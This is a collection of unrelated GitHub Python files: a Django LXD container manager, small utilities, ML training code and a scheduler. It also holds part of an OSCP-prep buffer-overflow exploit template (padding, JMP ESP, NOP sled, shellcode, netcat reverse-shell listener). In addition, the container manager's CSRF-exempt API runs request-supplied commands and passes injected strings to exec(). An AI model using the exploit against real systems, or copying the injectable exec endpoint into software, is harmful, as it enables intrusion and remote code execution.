+{"seq_id":"15178893279","text":"import json\nimport pkgutil\nimport subprocess\nimport simplejson\n# Stacktrace stuff\nimport traceback\n\nimport colorama\nimport urllib3\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import redirect\nfrom django.template import loader\nfrom django.views.decorators.csrf import csrf_exempt\nfrom pylxd import Client\nfrom django.core import serializers\nfrom datetime import *\n\nfrom .models import Container, Pool, Image\nfrom containers_site.COPA_general import *\n\n# Disable SSL warnings on terminal\nurllib3.disable_warnings()\n\n# Enable colorama module for Stacktrace\ncolorama.init()\n\n\ndef load_modules_from_dir(dirname):\n    for importer, package_name, _ in pkgutil.iter_modules([dirname]):\n        full_package_name = \"%s.%s\" % (dirname, package_name)\n        mdl = importer.find_module(package_name).load_module(full_package_name)\n    return mdl\n\n\ndef alert_type(content):\n    a_type = {\"success\": \"alert-success\",\n              \"error\": \"alert-danger\",\n              \"info\": \"alert-info\",\n              \"warning\": \"alert-warning\"}\n    return a_type[content]\n\n\ndef index(request):\n    return redirect(\"welcome\")\n\n\ndef welcome(request):\n    template = loader.get_template(\"core/welcome.html\")\n    return HttpResponse(template.render({}, request))\n\n\ndef containers_list(request, message=\"\", alert=\"\"):\n    containers = dict()\n    template = loader.get_template(\"core/containers_list.html\")\n    servers = get_server_list()\n    for server in servers:\n        pk_server = Pool.objects.get(name=server)\n        o_ip = get_ip_by_name(server)\n        try:\n            client_server = create_client(o_ip)\n            containers[server] = dict()\n            all_obj_server = Container.objects.filter(pool=pk_server)\n            for o in all_obj_server:\n                if o.full_network_info is not None:\n                    o.full_network_info = json.loads(o.full_network_info)\n\n            containers[\n                server] = all_obj_server  # client_server.containers.all()\n        except Exception as e:\n            message += \"&nbsp; Â&nbsp;• Error obtaining the containers list on server\" \\\n                       \" {}: {}&nbsp; Â&nbsp;• \".format(o_ip, str(e))\n            alert = alert_type(\"error\")\n\n            # Stacktrace\n            colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    params = {\"containers\": containers,\n              \"servers\": servers,\n              \"message\": message,\n              \"title\": \"Containers\",\n              \"alert_type\": alert}\n    return HttpResponse(template.render(params, request))\n\n\ndef containers_start(request, xhost, container_name):\n    host = get_ip_by_name(xhost)\n    try:\n        client_server = create_client(host)\n        container = client_server.containers.get(container_name)\n        result = container.start(wait=True)\n        cont_obj = Container.objects.get(name=container_name,\n                                         pool=Pool.objects.get(name=xhost))\n        cont_obj.status = container.status\n        cont_obj.save()\n        message = \"Container started successful.\"\n        alert = alert_type(\"success\")\n    except Exception as e:\n        message = \"Container error to start: \" + str(e)\n        alert = alert_type(\"error\")\n\n        # Stacktrace\n        colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    return containers_list(request, message, alert)\n\n\ndef containers_stop(request, xhost, container_name):\n    host = get_ip_by_name(xhost)\n    try:\n        client_server = create_client(host)\n        container = client_server.containers.get(container_name)\n        result = container.stop(wait=True)\n        cont_obj = Container.objects.get(name=container_name,\n                                         pool=Pool.objects.get(name=xhost))\n        cont_obj.status = container.status\n        cont_obj.save()\n        message = \"Container stopped successful.\"\n        alert = alert_type(\"success\")\n    except Exception as e:\n        message = \"Container error stop: \" + str(e)\n        alert = alert_type(\"error\")\n\n        # Stacktrace\n        colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    return containers_list(request, message, alert)\n\n\ndef containers_delete(request, xhost, container_name):\n    host = get_ip_by_name(xhost)\n    try:\n        client_server = create_client(host)\n        container = client_server.containers.get(container_name)\n        result = container.delete(wait=True)\n        Container.objects.get(pool=Pool.objects.get(name=xhost),\n                              name=container_name).delete()\n        message = \"Container deleted successfully.\"\n        alert = alert_type(\"success\")\n    except Exception as e:\n        message = \"Container error to delete: \" + str(e)\n        alert = alert_type(\"error\")\n\n        # Stacktrace\n        colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    return containers_list(request, message, alert)\n\n\ndef containers_freeze(request, xhost, container_name):\n    host = get_ip_by_name(xhost)\n    try:\n        client_server = create_client(host)\n        container = client_server.containers.get(container_name)\n        result = container.freeze(wait=True)\n        cont_obj = Container.objects.get(name=container_name,\n                                         pool=Pool.objects.get(name=xhost))\n        cont_obj.status = container.status\n        cont_obj.save()\n        message = \"Container frozen successful.\"\n        alert = alert_type(\"success\")\n    except Exception as e:\n        message = \"Container error to frozen: \" + str(e)\n        alert = alert_type(\"error\")\n\n        # Stacktrace\n        colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    return containers_list(request, message, alert)\n\n\ndef containers_new(request):\n    servers = None\n    images = None\n    message = \"\"\n    alert = \"\"\n    try:\n        servers = get_server_list()\n    except Exception as e:\n        message += \"Error getting the server list: {}.\".format(e)\n        alert = alert_type(\"error\")\n\n    try:\n        images = get_images_list()\n    except Exception as e:\n        message += \"Error getting the images list: {}.\".format(e)\n        alert = alert_type(\"error\")\n\n    template = loader.get_template(\"core/new_container.html\")\n    params = {\"servers\": servers,\n              \"images\": images,\n              \"message\": message,\n              \"alert_type\": alert}\n    return HttpResponse(template.render(params, request))\n\n\ndef containers_add(request):\n    message = \"\"\n    a_type = alert_type(\"success\")\n    container_name = str(request.POST.get(\"container_name\"))\n    xserver = str(request.POST.get(\"server\"))\n    image_type = str(request.POST.get(\"image_type\"))\n    profile = str(request.POST.get(\"profile\"))\n    wait_creation = bool(request.POST.get(\"wait_creation\"))\n    values = []\n    config = {\"name\": container_name,\n              \"source\": {\"server\": \"https://\" + IMAGE_HOST + \":8443\",\n                         \"protocol\": \"lxd\",\n                         \"type\": \"image\",\n                         \"mode\": \"pull\",\n                         \"fingerprint\": image_type}\n              }\n    server = get_ip_by_name(xserver)\n    try:\n        client_server = create_client(server)\n        print(\"HERE!\")\n        container = client_server.containers.create(config, wait=wait_creation)\n        print(\"HERE\")\n        container.start()\n        message = \"Container created sucessfully, go to admin container go \" \\\n                  \"to Containers list\"\n        Container(name=container_name,\n                  pool=Pool.objects.get(name=xserver),\n                  status=container.status).save()\n    except Exception as e:\n        message = \"Container creation error: \" + str(\n            e) + \" / \" + server + \" / \" + xserver\n        a_type = alert_type(\"error\")\n\n    servers = get_server_list()\n    images = get_images_list()\n    params = {\"servers\": servers,\n              \"images\": images,\n              \"values\": values,\n              \"message\": message,\n              \"alert_type\": a_type}\n    template = loader.get_template(\"core/new_container.html\")\n    return HttpResponse(template.render(params, request))\n\n\ndef containers_migrate(request, origin, name_container, destination):\n    ip_origin = get_ip_by_name(origin)\n    ip_destination = get_ip_by_name(destination)\n    try:\n        client_origin = create_client(ip_origin)\n        container = client_origin.containers.get(name_container)\n        client_destination = create_client(ip_destination)\n        container.migrate(client_destination, wait=True)\n        container = client_origin.containers.get(name_container)\n        container.delete(wait=True)\n        cont_obj = Container.objects.get(name=name_container,\n                                         pool=Pool.objects.get(name=origin))\n        cont_obj.pool = Pool.objects.get(name=destination)\n        cont_obj.save()\n        message = \"Container migration successful.\"\n        alert = alert_type(\"success\")\n    except Exception as e:\n        message = \"Container migration error: \" + str(e)\n        alert = alert_type(\"error\")\n\n        # Stacktrace\n        colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    return containers_list(request, message, alert)\n\n\ndef containers_terminal(request, server, container_name):\n    server_socket = request.get_host().replace(\":\" + request.get_port(), \"\")\n    container_address = get_ip_by_name(server) + \"/\" + container_name\n    template = loader.get_template(\"core/terminal.html\")\n    return HttpResponse(template.render({\"container_address\": container_address,\n                                         \"server_socket\": server_socket,\n                                         \"container_name\": container_name},\n                                        request))\n\n\ndef containers_info(request, xhost, container_name):\n    host = get_ip_by_name(xhost)\n    template = loader.get_template(\"core/container_info.html\")\n    try:\n        client_server = create_client(host)\n        container = Container.objects.get(name=container_name, pool=xhost)\n        if container.full_network_info is not None:\n            container.full_network_info = json.loads(\n                container.full_network_info)\n    except Exception as e:\n        container = None\n        message = \"Error deleting container: \" + str(e)\n        alert = alert_type(\"error\")\n\n        # Stacktrace\n        colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n    params = {\"container\": container,\n              \"title\": \"Container information\"}\n    return HttpResponse(template.render(params, request))\n\n\ndef containers_unfreeze(request, xhost, container_name):\n    a_type = alert_type(\"success\")\n    host = get_ip_by_name(xhost)\n    try:\n        client_server = create_client(host)\n        container = client_server.containers.get(container_name)\n        result = container.unfreeze(wait=True)\n        cont_obj = Container.objects.get(name=container_name,\n                                         pool=Pool.objects.get(name=xhost))\n        cont_obj.status = container.status\n        cont_obj.save()\n        message = \"Container unfreeze successful\"\n    except Exception as e:\n        message = \"Container error unfreeze: \" + str(e)\n        a_type = alert_type(\"error\")\n\n    return containers_list(request, message, a_type)\n\n\n@csrf_exempt\ndef api_execution(request):\n    response = {}\n    code = -1\n    result = None\n    try:\n        ostring = request.body\n        js = json.loads(ostring)\n\n        oper = js[\"operation\"]\n\n        if oper == \"copa_host_command\":\n            command = js[\"cmd\"]\n            if not isinstance(command, list):\n                raise Exception(\"Parameter 'cmd' must be a list\")\n            result = subprocess.check_output(command)\n\n        elif oper == \"copa_module_execution\":\n            pycom = js[\"method\"]\n            args = js[\"args\"]\n            if pycom == \"\":\n                raise Exception(\"Error: You must select the procedure/function \"\n                                \"to be called!\")\n            load_modules_from_dir(COPA_HOME + \"/containers_site/core/\"\n                                  \"copa_modules/\")\n            exec(\"result = modules.\" + pycom + \"( \" + args + \") \")\n\n        else:\n            x_server = get_ip_by_name(js[\"container_pool\"])\n            server = create_client(x_server)\n\n            if oper not in [\"create\", \"images_list\"]:\n                x_container = js[\"container_name\"]\n                db_container = Container.objects.get(name=x_container,\n                                                     pool=x_server)\n                container = server.containers.get(x_container)\n\n            if oper == \"start\":\n                container.start(wait=True)\n                db_container.status = container.status\n                db_container.save()\n                message = \"Container created successfully.\"\n\n            elif oper == \"stop\":\n                container.stop(wait=True)\n                db_container.status = container.status\n                db_container.save()\n                message = \"Container stopped successfully.\"\n\n            elif oper == \"freeze\":\n                container.freeze(wait=True)\n                db_container.status = container.status\n                db_container.save()\n                message = \"Container frozen successfully.\"\n\n            elif oper == 'unfreeze':\n                container.unfreeze(wait=True)\n                db_container.status = container.status\n                db_container.save()\n                message = \"Container unfrozen successfully\"\n\n            elif oper == \"delete\":\n                container.delete(wait=True)\n                db_container.status = container.status\n                db_container.save()\n                message = \"Container deleted successfully.\"\n\n            elif oper == \"migrate\":\n                ip_destination = get_ip_by_name(js[\"destination_pool\"])\n                client_destination = create_client(ip_destination)\n                container.migrate(client_destination, wait=True)\n                message = \"Container migration successful.\"\n                container = server.containers.get(x_container)\n                container.delete(wait=True)\n                db_container.pool = Pool.objects.get(\n                    name=js[\"destination_pool\"])\n                db_container.status = container.status\n                db_container.save()\n\n            elif oper == \"information\":\n                infos = container.state()\n                result = dict()\n                result[\"cpu\"] = infos.cpu  # just available in lxd >= 2.19\n                result[\"disk\"] = infos.disk\n                result[\"memory\"] = infos.memory\n                result[\"network\"] = infos.network\n\n            elif oper == \"command_execution\":\n                command = js[\"cmd\"]\n                if not isinstance(command, list):\n                    raise Exception(\"Parameter 'cmd' must be a list\")\n                result = container.execute(command)\n\n            elif oper == \"create\":\n                container_name = js[\"container_name\"]\n                container_pool = get_ip_by_name(js[\"container_pool\"])\n                image_type = js[\"image_type\"]\n                values = []\n                config = {\"name\": container_name,\n                          \"source\": {\n                              \"server\": \"https://\" + IMAGE_HOST + \":8443\",\n                              \"protocol\": \"\",\n                              \"type\": \"image\",\n                              \"mode\": \"pull\",\n                              \"fingerprint\": image_type}}\n                client_server = create_client(container_pool)\n\n                container = client_server.containers.create(config, wait=True)\n                Container(name=container_name,\n                          pool=Pool.objects.get(name=container_pool),\n                          status=container.status).save()\n                message = \"Container created successfully\"\n\n            elif oper == \"images_list\":\n                result = get_images_list()\n\n            else:\n                raise Exception(\"Unknown operation\")\n\n        code = 0\n        message = \"Process successful\"\n    except Exception as e:\n        message = \"COPA API error: \" + str(e)\n\n    response[\"code\"] = code\n    response[\"message\"] = message\n    response[\"result\"] = result\n\n    return JsonResponse(response, safe=False)\n","repo_name":"fernandaars/COPA","sub_path":"COPA_ufrgs/containers_site/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33205543694","text":"import sys\n\n\ndef build_dict(filepath):\n\n    word_freq = {}\n    with open(filepath) as text_file:\n        for line in text_file:\n            words = line.lower().split()\n            for word in words:\n                word_freq[word] = word_freq.get(word, 0) + 1\n                '''\n                # above line is same as below\n                if word in word_freq:\n                    word_freq[word] += 1\n                else:\n                    word_freq[word] = 1\n                '''\n    return word_freq\n\n\ndef print_words(filepath):\n\n    word_freq = build_dict(filepath)\n    for word, freq in sorted(word_freq.items()):\n        print(word + ' ' + str(freq))\n\n\ndef print_top(filepath):\n\n    word_freq = build_dict(filepath)\n    sorted_dict = sorted(word_freq.items(), key=lambda w: w[-1], reverse=True)\n    for word, freq in sorted_dict[:20]:\n        print(word + ' ' + str(freq))\n\n# This basic command line argument parsing code is provided and calls the\n# print_words() and print_top() functions which you must define.\nif __name__ == '__main__':\n    if len(sys.argv) != 3:\n        print('usage: ./wordcount.py {--count|--topcount} file')\n        sys.exit(1)\n\n    OPTION = sys.argv[1]\n    FILEPATH = sys.argv[2]\n    if OPTION == '--count':\n        print_words(FILEPATH)\n    elif OPTION == '--topcount':\n        print_top(FILEPATH)\n    else:\n        print('unknown option: ' + OPTION)\n        sys.exit(1)\n","repo_name":"hamstache/PythonScripts","sub_path":"word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25142150338","text":"from __future__ import absolute_import\nfrom collections import defaultdict\nimport numpy as np\nimport torch\n\nclass RandomIdentitySampler(torch.utils.data.Sampler):\n# class RandomIdentitySampler(torch.utils.data.sampler.Sampler):\n    \"\"\"\n    Randomly sample N identities, then for each identity,\n    randomly sample K instances, therefore batch size is N*K.\n\n    Code imported from https://github.com/Cysu/open-reid/blob/master/reid/utils/data/sampler.py.\n\n    Args:\n        data_source (Dataset): dataset to sample from.\n        num_instances (int): number of instances per identity.\n    \"\"\"\n    def __init__(self, data_source, num_instances=4):\n        self.data_source = data_source\n        self.num_instances = num_instances\n        self.index_dic = defaultdict(list)\n        for index, (_, pid, _) in enumerate(data_source):\n            self.index_dic[pid].append(index)\n        self.pids = list(self.index_dic.keys())\n        self.num_identities = len(self.pids)\n\n    def __iter__(self):\n        indices = torch.randperm(self.num_identities)\n        ret = []\n        for i in indices:\n            pid = self.pids[i]\n            t = self.index_dic[pid]\n            replace = False if len(t) >= self.num_instances else True\n            t = np.random.choice(t, size=self.num_instances, replace=replace)\n            ret.extend(t)\n        return iter(ret)\n\n    def __len__(self):\n        return self.num_identities * self.num_instances\n","repo_name":"mangye16/ReID-Survey","sub_path":"video-reid-AWG/samplers.py","file_name":"samplers.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":577,"dataset":"github-code","pt":"32"}
+{"seq_id":"27212417289","text":"# coding: utf-8\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n    url(r'^$', views.IndexView.as_view(), name='index'),\n    url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n    # ex: /polls/5/results/\n    url(r'^(?P[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n    # ex: /polls/5/vote/\n    url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n]\n#url()中第一项是域名的匹配,尖括号中是views带来的信息, 第二项是与调用view参数,第三项是name,其他模板通过命名来引用URL\n#让主URLconf可以链接到polls.urls模块。在mysite/urls.py中插入一个include():","repo_name":"forgoodsj/mysite","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18867077046","text":"\"\"\"A script to train vectors and biases for users and movies.\"\"\"\n\nimport argparse\nfrom collections import namedtuple\nfrom bisect import bisect_left\nimport csv\nimport logging\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\n# arguments\n# ---------\n\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\n    '-d', '--dim', type=int, default=20, help='dimensionality of learnt vectors')\nparser.add_argument(\n    '-e', '--epochs', type=float, default=1.0, help='training epochs (a fraction is also allowed)')\nparser.add_argument(\n    '-s', '--test-split', type=float, default=0.25, help='fraction of instances in test split')\nparser.add_argument(\n    '--track-loss', type=int, default=None, help='track stochastic loss after every given number of iterations')\nparser.add_argument(\n    '--eta-bu', type=float, default=0.1, help='learning rate for user biases')\nparser.add_argument(\n    '--eta-bm', type=float, default=0.1, help='learning rate for movie biases')\nparser.add_argument(\n    '--eta-vu', type=float, default=0.1, help='learning rate for user vectors')\nparser.add_argument(\n    '--eta-vm', type=float, default=0.1, help='learning rate for movie vectors')\nparser.add_argument(\n    '--lambda-bu', type=float, default=0.01, help='regularization penalty for user biases')\nparser.add_argument(\n    '--lambda-bm', type=float, default=0.01, help='regularization penalty for movie biases')\nparser.add_argument(\n    '--lambda-vu', type=float, default=0.01, help='regularization penalty for user vectors')\nparser.add_argument(\n    '--lambda-vm', type=float, default=0.01, help='regularization penalty for movie vectors')\nargs = parser.parse_args()\n\nif args.track_loss is not None:\n    logging.basicConfig(filename='train.log', filemode='w', level=logging.INFO)\n\n\n# rating data\n# -----------\n\nRating = namedtuple('Rating', ['user', 'movie', 'value'])\n\ntrain_data, test_data = [], []\ns = 1\n\nprint('Loading rating data ... ')\nrating_dir = 'dataset'\n\nfiles = os.listdir(rating_dir)\nfiles_with_progress_bar = tqdm(files, desc='files')\n\nfor filename in files_with_progress_bar:\n\n    movie = filename\n    movie = movie[:movie.index('.txt')]   # remove the .txt extension\n\n    with open(os.path.join(rating_dir, filename), 'r') as f:\n        reader = csv.reader(f)\n\n        for row in reader:\n            user, value = row[0], int(row[1])\n            rating = Rating(user, movie, value)\n            \n            # random seed for reproducibility\n            # a different random seed for each sample so that the outcome\n            # is different (but still reproducible) each time\n            random.seed(20 * s)\n            s += 1\n\n            if random.random() <= args.test_split:\n                test_data.append(rating)\n            else:\n                train_data.append(rating)\n\n\nprint('{} total.'.format(len(train_data) + len(test_data)))\nprint(\n    'Split into training data with {} ratings and test data with {} ratings.'.format(len(train_data), len(test_data)))\n\nmovie_names = sorted(set(r.movie for r in train_data + test_data))\nuser_ids = sorted(set(r.user for r in train_data + test_data))\nM, U = len(movie_names), len(user_ids)\n\n\n# training\n# --------\n\nmu = np.mean([r.value for r in train_data])\nuser_biases, movie_biases = np.zeros((U,)), np.zeros((M,))\n\nnp.random.seed(10)\nuser_vecs = np.random.randn(U, args.dim) * 0.01\n\nnp.random.seed(20)\nmovie_vecs = np.random.randn(M, args.dim) * 0.01\n\nepoch = 0\ntrain, calc_train_rmse, calc_test_rmse = True, False, False\n\ns = 1\n\n# adagrad memory matrices\nmem_user_biases = np.zeros_like(user_biases)\nmem_movie_biases = np.zeros_like(movie_biases)\nmem_user_vecs = np.zeros_like(user_vecs)\nmem_movie_vecs = np.zeros_like(movie_vecs)\n\nprint('Performing stochastic gradient descent (with adagrad update) ...')\n\nwhile True:\n\n    if train:\n        # parameters are being trained\n        data = train_data\n\n        if epoch == args.epochs:\n            # training is done, move to calculating training RMSE\n            calc_train_rmse = True\n            train = False\n            rmse = 0.0\n\n            if args.track_loss is not None:\n                print('Loss logged to train.log.')\n\n            print('Calculating training RMSE ...')\n\n        elif args.epochs - epoch < 1.0:\n            # less than one epoch of training left\n            iters = int((args.epochs - epoch) * len(data))\n            data = data[:iters]\n            epoch = args.epochs\n\n        else:\n            # one more epoch of training\n            epoch += 1\n\n            # random seed for reproducibility\n            # a different random seed for each epoch so that the shuffling\n            # is different (but still reproducible) each time\n            random.seed(10 * s)\n            s += 1\n\n            random.shuffle(data)\n\n\n    elif calc_train_rmse:\n        # training RMSE has been calculated\n        # rather training SSE has been calculated, convert it to RMSE\n        train_rmse = np.sqrt(rmse / len(train_data))\n        print(f'Training RMSE: {train_rmse:.6f}')\n\n        # move to calculating test RMSE\n        data = test_data\n        calc_test_rmse = True\n        calc_train_rmse = False\n        rmse = 0.0\n        print('Calculating test RMSE ...')\n\n    elif calc_test_rmse:\n        # test RMSE - rather SSE - has been calculated, convert it to RMSE\n        test_rmse = np.sqrt(rmse / len(test_data))\n        print(f'Test RMSE: {test_rmse:.6f}')\n        break\n\n\n    data_with_progress_bar = tqdm(\n        enumerate(data),\n        desc='iterations', total=len(data)\n    )\n\n    for idx, rating in data_with_progress_bar:\n\n        # bisect_left performs binary search, which is much, much faster than\n        # calling .index() on a list and performing linear search.\n        u = bisect_left(user_ids, rating.user)\n        m = bisect_left(movie_names, rating.movie)\n\n        true = rating.value   # true rating value\n\n        # predicted rating value\n        pred = (mu + user_biases[u] + movie_biases[m]\n                + np.dot(user_vecs[u], movie_vecs[m]))\n\n        loss = (true - pred) ** 2\n\n        if calc_train_rmse or calc_test_rmse:\n            rmse += loss\n            continue\n\n        # calculated gradients\n        grad_user_bias = (pred - true) + (args.lambda_bu * user_biases[u])\n        grad_movie_bias = (pred - true) + (args.lambda_bm * movie_biases[m])\n        grad_user_vec = (pred - true) * movie_vecs[m] + (args.lambda_vu * user_vecs[u])\n        grad_movie_vec = (pred - true) * user_vecs[u] + (args.lambda_vm * movie_vecs[m])\n\n        # update memory matrices\n        mem_user_biases[u] += grad_user_bias ** 2\n        mem_movie_biases[m] += grad_movie_bias ** 2\n        mem_user_vecs[u] += grad_user_vec ** 2\n        mem_movie_vecs[m] += grad_movie_vec ** 2\n\n        # adagrad updates\n        user_biases[u] -= args.eta_bu / np.sqrt(mem_user_biases[u] + 1e-8) * grad_user_bias\n        movie_biases[m] -= args.eta_bm / np.sqrt(mem_movie_biases[m] + 1e-8) * grad_movie_bias\n        user_vecs[u] -= args.eta_vu / np.sqrt(mem_user_vecs[u] + 1e-8) * grad_user_vec\n        movie_vecs[m] -= args.eta_vm / np.sqrt(mem_movie_vecs[m] + 1e-8) * grad_movie_vec\n\n        if args.track_loss is not None:\n            if (idx + 1) % args.track_loss == 0:\n                logging.info(f'epoch {epoch} iteration {idx + 1}: loss {loss:.6f}')\n\n\n# save parameters\n# ---------------\n\nwith open('params.pkl', 'wb') as f:\n    pickle.dump(\n        {\n            'mu': mu,\n            'user_biases': user_biases,\n            'movie_biases': movie_biases,\n            'user_vecs': user_vecs,\n            'movie_vecs': movie_vecs,\n            'user_ids': user_ids,\n            'movie_names': movie_names\n        }, f)\n\nprint('Trained parameters saved to params.pkl')\n","repo_name":"codeandfire/movievecs","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
    \n # Not all of these might be badchars! Sometimes badchars cause the next\n # byte to get corrupted as well, or even effect the rest of the string.\n # The first badchar in the list should be the null byte (\\x00) since we\n # already removed it from the file. Make a note of any others. Generate a\n # new bytearray in mona, specifying these new badchars along with \\x00.\n # Repeat the badchar comparison until the results status returns\n # \"Unmodified\". This indicates that no more badchars exist.\n test_connection()\n allowed = gen_bytes(bad_bytes=BAD_BYTES)\n padding = b\"A\" * EIP_OFFSET\n payload = padding\n payload += b\"BBBB\"\n payload += allowed\n try:\n send_payload(payload)\n except socket.timeout:\n print(\"[*] Now use these commands and check for 'Unmodified' status:\")\n print(f'!mona bytearray -b \"{hexbytes(BAD_BYTES)}\"')\n print(\"!mona compare -f C:\\\\mona\\\\bytearray.bin -a ESP_ADDR\")\n else:\n print(\"[x] Connection didn't hang. Check your send_payload() function\")\n exit(1)\n\n\ndef get_shellcode():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-f\",\n \"--file\",\n type=argparse.FileType(\"rb\"),\n help=\"Path to binary file containing raw shellcode bytes\",\n )\n args = parser.parse_args()\n if args.file is not None:\n shellcode = args.file.read()\n args.file.close()\n else:\n shellcode = gen_shellcode(bad_bytes=BAD_BYTES)\n return shellcode\n\n\ndef do_exploit():\n # to find jmp_esp, use the following mona command: (-cpb avoids bad ptr bytes)\n # !mona jmp -r esp -cpb '\\x00...'\n # or look for specific instruction:\n # !mona find -s 'jmp esp' -type instr -cm aslr=false,rebase=false,nx=false -cpb \"\\x00\\x0a\\x0d\"\n test_connection()\n if not JMP_ESP:\n print(\"[*] Use the following to get a jmp-esp gadget:\")\n print(f\"!mona jmp -r esp -cpb '{hexbytes(BAD_BYTES)}'\")\n print(\"[*] AND START YOUR NETCAT LISTENER!\")\n print(f\"sudo nc -lvnp {LPORT}\")\n exit(1)\n\n padding = b\"A\" * EIP_OFFSET\n nopsled = b\"\\x90\" * 32 # to handle encoders\n shellcode = get_shellcode()\n\n payload = padding\n payload += p32(JMP_ESP)\n payload += nopsled\n payload += shellcode\n print(\"[*] Sending exploit payload. Hopefully you have a listener ready!\")\n try:\n send_payload(payload)\n except socket.timeout:\n pass\n else:\n print(\"[x] Connection didn't hang. 
Check your send_payload() function\")\n exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"camercu/oscp-prep","sub_path":"tools/win/pwn-bof-template.py","file_name":"pwn-bof-template.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"32"} +{"seq_id":"69980675292","text":"from .conditional import ConditionalBlock, ConditionalTCNBlock\nfrom .dcrnn import DCRNNCell, DCRNN\nfrom .dense_dcrnn import DenseDCRNNCell, DenseDCRNN\nfrom .gcgru import GraphConvGRUCell, GraphConvGRU\nfrom .gclstm import GraphConvLSTMCell, GraphConvLSTM\nfrom .mlp import MLP, ResidualMLP\nfrom .rnn import RNN\nfrom .stcn import SpatioTemporalConvNet\nfrom .tcn import TemporalConvNet\nfrom .transformer import (TransformerLayer, SpatioTemporalTransformerLayer,\n Transformer)\n\ngeneral_classes = [\n 'ConditionalBlock',\n 'ConditionalTCNBlock',\n 'MLP',\n 'ResidualMLP',\n 'RNN',\n]\n\ncell_classes = [\n 'DCRNNCell',\n 'DenseDCRNNCell',\n 'GraphConvGRUCell',\n 'GraphConvLSTMCell'\n]\n\ngrnn_classes = [\n 'DCRNN',\n 'DenseDCRNN',\n 'GraphConvGRU',\n 'GraphConvLSTM'\n]\n\nconv_classes = [\n 'TemporalConvNet',\n 'SpatioTemporalConvNet'\n]\n\ntransformer_classes = [\n 'TransformerLayer',\n 'SpatioTemporalTransformerLayer',\n 'Transformer'\n]\n\nclasses = [\n *general_classes,\n *cell_classes,\n *grnn_classes,\n *conv_classes,\n *transformer_classes\n]\n\n__all__ = classes\n","repo_name":"Graph-Machine-Learning-Group/sgp","sub_path":"tsl/nn/blocks/encoders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"72554343772","text":"#!/usr/bin/python3\nfrom __future__ import print_function, absolute_import\nfrom threading import Thread, Event\nfrom datetime import datetime, timedelta\n\nlistenPort = 9993\n\ndef singleton(cls):\n\tinstances = {}\n\tdef getinstance():\n\t\tif cls not in instances:\n\t\t\tinstances[cls] = cls()\n\t\treturn instances[cls]\n\treturn getinstance\n\nclass eventInfo(object):\n\tdef __init__(self, reached=False, new_delta=0, skew=0):\n\t\tself.reached = reached\n\t\tself.delta = new_delta\n\t\tself.skew = skew\n\nclass event(object):\n\tevent_dispatcher = 'scheduler'\n\tdef __init__(self, _time=None, t='', args=None, _id=0):\n\t\tself.time = _time\n\t\tself.cur = datetime.now()\n\t\tself.dtime = self.cur\n\t\tself.last = None\n\t\tself.id = _id\n\t\tself.args = args\n\t\tself.type = t\n\t\tself.active = True\n\t\tself.recalc = self.__getattribute__(t)\n\n\tdef __str__(self):\n\t\treturn \"\" % (str(self.time), self.op)\n\n\tdef every(self, new):\n\t\tif new >= self.dtime:\n\t\t\told = self.dtime\n\t\t\tself.dtime = self.cur\n\t\t\twhile self.dtime < new:\n\t\t\t\tself.dtime += self.time\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.dtime - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.dtime - new)\n\n\tdef daily(self, new):\n\t\tif new > self.time:\n\t\t\told = self.time\n\t\t\tself.time += timedelta(days=1)\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.time - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.time - new)\n\n\tdef reg_daily(self, new):\n\t\tif new > self.time:\n\t\t\told = self.time\n\t\t\tif new.isoweekday() < 5:\n\t\t\t\tself.time += timedelta(days=1)\n\t\t\telse:\n\t\t\t\tself.time += timedelta(days=8-new.isoweekday())\n\t\t\tself.last = datetime.now()\n\t\t\treturn 
